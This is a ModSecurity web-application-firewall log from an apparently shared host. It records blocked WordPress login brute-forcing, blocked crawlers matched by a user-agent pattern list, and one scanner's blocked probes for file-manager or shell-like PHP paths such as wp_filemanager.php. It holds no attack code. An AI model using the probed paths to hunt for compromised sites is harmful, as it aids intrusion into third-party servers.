[Tue May 26 19:45:20.719066 2026] [security2:error] [pid 77894:tid 78050] [client 172.225.77.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWq-DomEhVPuJoD1MZlBQAAABo"]
[Tue May 26 19:45:20.923860 2026] [security2:error] [pid 77894:tid 78080] [client 86.227.63.46:59103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.63.227.86.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/xmlrpc.php"] [unique_id "ahWq-DomEhVPuJoD1MZlEgAAADg"]
[Tue May 26 19:45:20.923986 2026] [security2:error] [pid 77894:tid 78080] [client 86.227.63.46:59103] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/xmlrpc.php"] [unique_id "ahWq-DomEhVPuJoD1MZlEgAAADg"]
[Tue May 26 19:45:22.116682 2026] [security2:error] [pid 77894:tid 78143] [client 114.119.158.0:47617] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-boxed-column/page/3"] [unique_id "ahWq-jomEhVPuJoD1MZlNQAAAHc"], referer: http://www.anujtradingco.com/blog-2/blog-boxed-column/
[Tue May 26 19:45:22.763653 2026] [security2:error] [pid 77894:tid 78144] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq-jomEhVPuJoD1MZlPAAAAHg"]
[Tue May 26 19:45:23.008853 2026] [security2:error] [pid 77894:tid 77934] [remote 123.30.233.13:58396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWq-jomEhVPuJoD1MZlTQAACyc"]
[Tue May 26 19:45:23.513893 2026] [security2:error] [pid 77894:tid 77946] [remote 38.95.35.74:52634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWq-zomEhVPuJoD1MZlVAAAMjM"]
[Tue May 26 19:45:25.125609 2026] [security2:error] [pid 77894:tid 77943] [remote 38.95.35.74:52634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWq_TomEhVPuJoD1MZlhwAAZTA"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 19:45:25.404102 2026] [security2:error] [pid 77894:tid 78075] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq_DomEhVPuJoD1MZlhgAAADM"]
[Tue May 26 19:45:27.165665 2026] [security2:error] [pid 77894:tid 77969] [remote 160.250.186.220:38498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWq_jomEhVPuJoD1MZlvwAABEo"]
[Tue May 26 19:45:28.037946 2026] [security2:error] [pid 77894:tid 77973] [remote 47.128.47.105:23472] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/medias/665-senegal-le-fdsut-connecte-trois-ecoles-de-la-banlieue-dakaroise"] [unique_id "ahWrADomEhVPuJoD1MZmCwAANE4"]
[Tue May 26 19:45:28.170328 2026] [security2:error] [pid 77894:tid 78057] [client 152.58.61.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWrADomEhVPuJoD1MZmEgAAACE"], referer: https://www.ucdc.co.in/
[Tue May 26 19:45:28.258791 2026] [security2:error] [pid 77894:tid 78093] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq_zomEhVPuJoD1MZmAQAAAEU"]
[Tue May 26 19:45:30.776797 2026] [security2:error] [pid 77894:tid 78071] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrAjomEhVPuJoD1MZmUAAAAC8"]
[Tue May 26 19:45:31.058856 2026] [security2:error] [pid 77894:tid 78133] [client 147.53.127.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWrAzomEhVPuJoD1MZmYQAAAG0"], referer: https://www.anujtradingco.com/
[Tue May 26 19:45:32.581212 2026] [security2:error] [pid 77894:tid 78068] [client 147.53.127.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWrBDomEhVPuJoD1MZmjQAAACw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1264994&moderation-hash=c8d897cb135281ef76835ec35ac96745
[Tue May 26 19:45:32.883548 2026] [security2:error] [pid 77894:tid 78128] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrBDomEhVPuJoD1MZmiQAAAGg"]
[Tue May 26 19:45:33.689207 2026] [security2:error] [pid 77894:tid 78116] [client 172.59.185.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrBTomEhVPuJoD1MZmowAAAFw"]
[Tue May 26 19:45:34.262478 2026] [security2:error] [pid 77894:tid 78004] [remote 84.247.181.196:43968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrBjomEhVPuJoD1MZmuAAAKW0"]
[Tue May 26 19:45:35.182179 2026] [security2:error] [pid 77894:tid 77978] [remote 84.247.181.196:43968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrBzomEhVPuJoD1MZm2gAAG1M"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:45:35.433667 2026] [security2:error] [pid 77894:tid 78058] [client 66.249.64.33:62490] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrBjomEhVPuJoD1MZmyAAAACI"], referer: https://mosykay.com/prizes/122615056
[Tue May 26 19:45:36.030135 2026] [security2:error] [pid 77894:tid 78061] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrBzomEhVPuJoD1MZm7QAAACU"]
[Tue May 26 19:45:36.782785 2026] [security2:error] [pid 77894:tid 78007] [remote 103.95.119.103:50744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWrCDomEhVPuJoD1MZnDQAAfnA"]
[Tue May 26 19:45:37.744399 2026] [security2:error] [pid 77894:tid 77989] [remote 51.91.98.45:58452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrCTomEhVPuJoD1MZnLAAAGV4"]
[Tue May 26 19:45:37.825275 2026] [security2:error] [pid 77894:tid 78064] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrCTomEhVPuJoD1MZnKAAAACg"]
[Tue May 26 19:45:39.503280 2026] [security2:error] [pid 77894:tid 78151] [client 75.13.66.101:57264] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahWrCTomEhVPuJoD1MZnNwAAf18"]
[Tue May 26 19:45:39.975259 2026] [security2:error] [pid 77894:tid 78086] [client 75.13.66.101:57264] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahWrCzomEhVPuJoD1MZngQAAPmg"]
[Tue May 26 19:45:40.370086 2026] [security2:error] [pid 77894:tid 77930] [remote 79.143.178.15:59426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrDDomEhVPuJoD1MZnhwAAKyM"]
[Tue May 26 19:45:40.524536 2026] [security2:error] [pid 77894:tid 78122] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrDDomEhVPuJoD1MZnhgAAAGI"]
[Tue May 26 19:45:43.274416 2026] [security2:error] [pid 77894:tid 78148] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrDjomEhVPuJoD1MZnzgAAAHw"]
[Tue May 26 19:45:43.894738 2026] [security2:error] [pid 77894:tid 77899] [remote 79.143.178.15:59426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrDzomEhVPuJoD1MZn8gAASwQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:45:45.625619 2026] [security2:error] [pid 77894:tid 78102] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrETomEhVPuJoD1MZoGgAAAE4"]
[Tue May 26 19:45:48.832924 2026] [security2:error] [pid 77894:tid 78074] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrFDomEhVPuJoD1MZofwAAADI"]
[Tue May 26 19:45:49.128174 2026] [security2:error] [pid 77894:tid 77911] [remote 92.205.188.156:41004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWrFDomEhVPuJoD1MZogwAAShA"]
[Tue May 26 19:45:51.459840 2026] [security2:error] [pid 77894:tid 77918] [remote 92.205.109.21:34546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrFzomEhVPuJoD1MZoywAAGRc"]
[Tue May 26 19:45:51.474020 2026] [security2:error] [pid 77894:tid 77920] [remote 92.205.188.156:41004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWrFzomEhVPuJoD1MZo0gAAJBk"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:45:51.696329 2026] [security2:error] [pid 77894:tid 77922] [remote 92.205.109.21:34546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrFzomEhVPuJoD1MZo2QAAThs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:45:52.049145 2026] [security2:error] [pid 77894:tid 78126] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrFzomEhVPuJoD1MZo2AAAAGY"]
[Tue May 26 19:45:52.196659 2026] [security2:error] [pid 77894:tid 78081] [client 113.186.96.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrFzomEhVPuJoD1MZo3gAAADk"]
[Tue May 26 19:45:53.571270 2026] [security2:error] [pid 77894:tid 77927] [remote 18.209.220.99:39972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWrGTomEhVPuJoD1MZpEQAALSA"]
[Tue May 26 19:45:54.075087 2026] [security2:error] [pid 77894:tid 78121] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrGTomEhVPuJoD1MZpHQAAAGE"]
[Tue May 26 19:45:54.906336 2026] [security2:error] [pid 77894:tid 77937] [remote 52.66.96.197:40202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.96.66.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWrGjomEhVPuJoD1MZpNwAAKio"]
[Tue May 26 19:45:56.164580 2026] [security2:error] [pid 77894:tid 78072] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrGzomEhVPuJoD1MZpXQAAADA"]
[Tue May 26 19:45:57.393131 2026] [security2:error] [pid 77894:tid 78113] [client 82.152.243.119:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWrGzomEhVPuJoD1MZpTgAAAFk"]
[Tue May 26 19:45:58.933493 2026] [security2:error] [pid 77894:tid 78067] [client 20.226.60.108:10090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWrHjomEhVPuJoD1MZpswAAACs"]
[Tue May 26 19:45:58.933618 2026] [security2:error] [pid 77894:tid 78067] [client 20.226.60.108:10090] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWrHjomEhVPuJoD1MZpswAAACs"]
[Tue May 26 19:45:59.498602 2026] [security2:error] [pid 77894:tid 78028] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrHzomEhVPuJoD1MZptwAAAAQ"]
[Tue May 26 19:45:59.812377 2026] [security2:error] [pid 77894:tid 78081] [client 185.191.171.15:38280] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWrHzomEhVPuJoD1MZpzwAAADk"]
[Tue May 26 19:45:59.812522 2026] [security2:error] [pid 77894:tid 78081] [client 185.191.171.15:38280] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWrHzomEhVPuJoD1MZpzwAAADk"]
[Tue May 26 19:45:59.873818 2026] [security2:error] [pid 77894:tid 78071] [client 109.176.51.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWrHzomEhVPuJoD1MZpzAAAAC8"]
[Tue May 26 19:46:00.375523 2026] [security2:error] [pid 77894:tid 77948] [remote 8.130.10.226:34850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.10.130.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrIDomEhVPuJoD1MZp0wAABTU"]
[Tue May 26 19:46:00.809758 2026] [security2:error] [pid 77894:tid 78066] [client 20.226.60.108:9810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/admin.php"] [unique_id "ahWrIDomEhVPuJoD1MZp2wAAACo"]
[Tue May 26 19:46:00.809877 2026] [security2:error] [pid 77894:tid 78066] [client 20.226.60.108:9810] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/admin.php"] [unique_id "ahWrIDomEhVPuJoD1MZp2wAAACo"]
[Tue May 26 19:46:01.948409 2026] [security2:error] [pid 77894:tid 78100] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrITomEhVPuJoD1MZp9gAAAEw"]
[Tue May 26 19:46:02.185507 2026] [security2:error] [pid 77894:tid 78087] [client 82.26.187.175:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWrIjomEhVPuJoD1MZqDwAAAD8"]
[Tue May 26 19:46:02.575922 2026] [security2:error] [pid 77894:tid 78089] [client 20.226.60.108:24126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/inputs.php"] [unique_id "ahWrIjomEhVPuJoD1MZqIgAAAEE"]
[Tue May 26 19:46:02.576057 2026] [security2:error] [pid 77894:tid 78089] [client 20.226.60.108:24126] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/inputs.php"] [unique_id "ahWrIjomEhVPuJoD1MZqIgAAAEE"]
[Tue May 26 19:46:04.006130 2026] [security2:error] [pid 77894:tid 78073] [client 114.119.137.184:62707] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/legumes-and-cereals/"] [unique_id "ahWrJDomEhVPuJoD1MZqRgAAADE"], referer: https://rohiniventures.com/coffee
[Tue May 26 19:46:05.442014 2026] [security2:error] [pid 77894:tid 78080] [client 20.226.60.108:11179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/file.php"] [unique_id "ahWrJTomEhVPuJoD1MZqdQAAADg"]
[Tue May 26 19:46:05.442137 2026] [security2:error] [pid 77894:tid 78080] [client 20.226.60.108:11179] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/file.php"] [unique_id "ahWrJTomEhVPuJoD1MZqdQAAADg"]
[Tue May 26 19:46:05.722680 2026] [security2:error] [pid 77894:tid 78120] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrJTomEhVPuJoD1MZqdAAAAGA"]
[Tue May 26 19:46:06.603873 2026] [security2:error] [pid 77894:tid 78110] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrJjomEhVPuJoD1MZqiwAAAFY"]
